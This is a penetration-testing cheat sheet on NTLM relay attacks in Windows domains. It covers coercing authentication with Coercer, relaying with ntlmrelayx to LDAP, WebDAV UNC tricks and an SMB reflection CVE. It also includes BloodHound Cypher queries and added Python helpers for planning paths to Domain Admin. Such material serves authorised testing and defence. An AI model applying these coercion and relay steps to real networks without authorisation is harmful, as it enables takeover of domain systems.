NTLM Relaying Tips and Tricks

NTLM Relay Cheat Sheet

NTLM Relay

Note: the cheat sheet assumes modern Windows with NTLMv2 in use. NTLMv1 behaves like HTTP-originated auth and can be relayed to every target marked with a "1" in the relay matrix (the matrix itself is not reproduced here). When relaying NTLMv1 with ntlmrelayx you must in most cases pass the --remove-mic flag (for example for SMB->LDAP).

Coerced Authentication via RPC Methods (PetitPotam, ShadowCoerce, DFSCoerce, SpoolSample, etc.)

Coercer is your best bet: it bundles most of the published coercion PoCs into a single, well-tested tool, and it works well through a SOCKS5 proxy. Remember the --auth-type {smb,http} flag, because in many cases you want HTTP: authentication coerced over HTTP (WebDAV) does not negotiate signing and can therefore be relayed to LDAP/LDAPS, which SMB-originated auth cannot be on patched hosts. Coercer can almost always coerce SMB auth, and HTTP only when the WebClient service is running on the victim.

ntlmrelayx (Impacket) is the de facto relaying tool. It accepts incoming auth over several protocols, relays to a wide range of services, and automatically performs many of the follow-on attacks.

Checking for WebDAV

The state of the Windows WebClient service tells you whether coerced auth via WebDAV (HTTP) will work. Any domain user can check remotely whether the service is running on a host, for example by testing whether the DAV RPC SERVICE named pipe is exposed (netexec's webdav module does exactly this), which makes it easy to find good relay victims.

You can trigger WebDAV auth to different ports and over HTTP or HTTPS from the victim like so. Note that the WebClient only authenticates automatically to hosts it places in the intranet zone, which is why a dotless hostname such as bbout is used rather than an IP address:

dir \\bbout\folder
dir \\bbout@8443\folder
dir \\bbout@SSL\folder
dir \\bbout@SSL@8443\folder
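As an added example (not from the original cheat sheet), the following Python maps the Windows WebDAV UNC syntax above onto the HTTP(S) listener a relay server has to bind, and back again. It encodes how the Mini-Redirector treats @SSL and @port; the dotless-host check is a heuristic for the intranet-zone requirement, and the hostnames and paths are made up.

```python
"""Added example: WebDAV UNC path <-> relay listener mapping.

The Windows WebClient (Mini-Redirector) reads UNC paths of the form
\\\\host[@SSL][@port]\\share\\path and turns them into HTTP(S) requests.
This encodes those rules so you know which listener ntlmrelayx must run
for a given coercion path, and which UNC to hand to a victim for a given
listener. Not part of any upstream tool; hostnames are made up.
"""
import re
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class WebDavTarget:
    scheme: str          # "http" or "https"
    host: str
    port: int
    path: str            # URL path with forward slashes
    dotless_host: bool   # heuristic: a dotless NetBIOS-style name lands in the
                         # intranet zone, where the WebClient auto-authenticates

    @property
    def url(self) -> str:
        return f"{self.scheme}://{self.host}:{self.port}{self.path}"


# \\host, then zero or more @modifiers, then an optional \path
_UNC = re.compile(r"^\\\\(?P<host>[^\\@]+)(?P<mods>(?:@[^\\@]+)*)(?P<path>\\.*)?$")


def parse_webdav_unc(unc: str) -> WebDavTarget:
    """Return the listener the WebClient will talk to for this UNC path."""
    m = _UNC.match(unc)
    if not m:
        raise ValueError(f"not a UNC path: {unc!r}")
    host = m.group("host")
    scheme, port, explicit_port = "http", 80, False
    for mod in m.group("mods").split("@")[1:]:
        if mod.upper() == "SSL":
            scheme = "https"
            if not explicit_port:
                port = 443
        elif mod.isdigit():
            port, explicit_port = int(mod), True
        else:
            raise ValueError(f"unknown UNC modifier {mod!r} in {unc!r}")
    path = (m.group("path") or "\\").replace("\\", "/")
    # IP literals and dotted names are not in the intranet zone by default,
    # so the WebClient will not send NTLM to them without a zone/policy change.
    dotless = "." not in host
    return WebDavTarget(scheme, host, port, path, dotless)


def build_unc(host: str, port: Optional[int] = None, ssl: bool = False,
              path: str = "\\") -> str:
    """Inverse of parse_webdav_unc: the UNC to 'dir' from the victim for a listener."""
    mods = "@SSL" if ssl else ""
    if port is not None and port != (443 if ssl else 80):
        mods += f"@{port}"
    return f"\\\\{host}{mods}{path}"


if __name__ == "__main__":
    for unc in (r"\\bbout\folder", r"\\bbout@8443\folder",
                r"\\bbout@SSL\folder", r"\\bbout@SSL@8443\folder",
                r"\\10.0.0.5\folder"):
        t = parse_webdav_unc(unc)
        zone = "intranet (auto-auth)" if t.dotless_host else "internet (no auto-auth)"
        print(f"{unc:<28} -> listen on {t.url:<30} {zone}")
```

Run it to see which ntlmrelayx HTTP/HTTPS listener each coercion path reaches; the last row shows why an IP address is a poor coercion target for WebDAV.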

It's probably also worth marking all these targets as owned in BloodHound to see which of them give paths to Domain Admins, like so:

Neo4j Console Bulk Mark as Owned

MATCH (u:Computer) WHERE (u.name IN [
"SERVER1.CONTOSO.COM",
"SERVER2.CONTOSO.COM",
"SERVER3.CONTOSO.COM",
"SERVER4.CONTOSO.COM"
]) SET u.owned = true
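As an added example (not from the cheat sheet), the Python below generates the bulk mark-as-owned statement above from a raw list of hosts, normalising names to the UPPERCASE FQDN form BloodHound stores and appending a count so a result of 0 tells you the names did not match any node. The host list and domain are made up.

```python
"""Added example: generate the Neo4j 'bulk mark as owned' statement.

Scanner output (dotless names, trailing '$' from machine-account names,
\\\\host prefixes, mixed case) rarely matches the UPPERCASE FQDN that
BloodHound uses for Computer.name, and a mismatched name silently marks
nothing. This normalises the list and adds a RETURN so the console shows
how many nodes were actually updated. Hostnames and domain are invented.
"""
from typing import Iterable


def normalize_computer_name(name: str, default_domain: str) -> str:
    """'\\\\srv01$' or 'srv01' -> 'SRV01.<DEFAULT_DOMAIN>'."""
    name = name.strip()
    if name.startswith("\\\\"):
        name = name[2:]
    name = name.split("\\", 1)[0]          # drop any share/path component
    name = name.rstrip(".").rstrip("$")    # trailing dot, machine-account '$'
    if "." not in name:
        name = f"{name}.{default_domain}"
    return name.upper()


def cypher_string(value: str) -> str:
    """Quote a string literal for Cypher (escape backslashes and quotes)."""
    return '"' + value.replace("\\", "\\\\").replace('"', '\\"') + '"'


def bulk_mark_owned_cypher(hosts: Iterable[str], default_domain: str) -> str:
    """Build the statement to paste into the Neo4j console."""
    names = sorted({normalize_computer_name(h, default_domain) for h in hosts if h.strip()})
    if not names:
        raise ValueError("no hosts to mark as owned")
    body = ",\n".join("  " + cypher_string(n) for n in names)
    # RETURN count(u): if this prints 0, the names did not match any Computer node
    return (
        "MATCH (u:Computer) WHERE u.name IN [\n"
        f"{body}\n"
        "] SET u.owned = true\n"
        "RETURN count(u) AS marked_owned"
    )


if __name__ == "__main__":
    # Constructed sample, e.g. hosts where a WebClient check came back positive
    webdav_hosts = ["server1", "Server2.contoso.com.", "\\\\SERVER3$", "server4$", ""]
    print(bulk_mark_owned_cypher(webdav_hosts, "contoso.com"))
```

The property name u.owned matches what the shortest-path query below filters on, so hosts marked this way show up as start nodes there.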

Shortest Path to DA from Owned Computers

BloodHound CE handles owned objects differently from legacy BloodHound, so you'll have to write your own Cypher queries, like so:

MATCH p=shortestPath((s:Computer)-[:Owns|GenericAll|GenericWrite|WriteOwner|WriteDacl|MemberOf|ForceChangePassword|AllExtendedRights|AddMember|HasSession|GPLink|AllowedToDelegate|CoerceToTGT|AllowedToAct|AdminTo|CanPSRemote|CanRDP|ExecuteDCOM|HasSIDHistory|AddSelf|DCSync|ReadLAPSPassword|ReadGMSAPassword|DumpSMSAPassword|SQLAdmin|AddAllowedToAct|WriteSPN|AddKeyCredentialLink|SyncLAPSPassword|WriteAccountRestrictions|WriteGPLink|GoldenCert|ADCSESC1|ADCSESC3|ADCSESC4|ADCSESC6a|ADCSESC6b|ADCSESC9a|ADCSESC9b|ADCSESC10a|ADCSESC10b|ADCSESC13|SyncedToEntraUser|CoerceAndRelayNTLMToSMB|CoerceAndRelayNTLMToADCS|WriteOwnerLimitedRights|OwnsLimitedRights|CoerceAndRelayNTLMToLDAP|CoerceAndRelayNTLMToLDAPS|Contains|DCFor|SameForestTrust|SpoofSIDHistory|AbuseTGTDelegation*1..]->(t:Group))
WHERE s.enabled = true
AND s.owned = true
AND t.objectid ENDS WITH '-512'
RETURN p

Then coerce the best targets, relay their machine-account auth to LDAP/LDAPS on a DC that does not enforce LDAP signing or channel binding, and compromise them via RBCD or Shadow Credentials.

CVE-2025-33073

If a computer has not been patched for CVE-2025-33073 and does not require SMB signing, you can coerce it and relay the SMB auth back to that same computer (SMB->SMB reflection). This effectively gets you admin on that computer.

via Spoofing Attacks (LLMNR, NBT-NS, MDNS, DHCPv6 DNS takeover, ARP, etc.)

via Share Poisoning (.lnk, .url, .library-ms, .searchConnector-ms, etc.)

Post-Exploitation

Resource Based Constrained Delegation

Shadow Credentials

Useful Links